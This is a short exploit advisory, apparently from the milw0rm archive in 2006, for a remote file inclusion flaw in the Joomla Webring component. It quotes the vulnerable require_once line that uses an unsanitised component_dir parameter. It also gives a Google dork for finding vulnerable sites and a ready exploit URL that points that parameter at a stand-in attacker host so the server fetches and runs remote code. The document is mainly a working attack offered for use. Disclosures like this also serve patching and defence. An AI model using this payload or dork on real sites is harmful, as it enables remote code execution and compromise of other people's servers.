|
####################################################=0D
# #=0D
# C Y BE R - W A R R i O R T I M #=0D
# #=0D
####################################################=0D
=0D
Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities=0D
=0D
####################################################=0D
=0D
Author: xoron=0D
=0D
####################################################=0D
=0D
Class : Remote=0D
=0D
####################################################=0D
=0D
cont@ct: x0r0n[at]hotmail[dot]com=0D
=0D
####################################################=0D
=0D
Code: in admin.webring.docs.php, line 12=0D
=0D
require_once ($component_dir. "mungdocs.class.php");=0D
=0D
####################################################=0D
=0D
Google dork: inurl:com_webring=0D
=0D
####################################################=0D
=0D
Exploit:=0D
http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?=0D
=0D
####################################################=0D
=0D
Greetz: str0ke, Preddy, Ironfist, x-master, DJR, R3D4C!D=0D
=0D
####################################################=0D
=0D
# milw0rm.com [2006-08-13]= http://www.milw0rm.com/exploits/2177=0D
=0D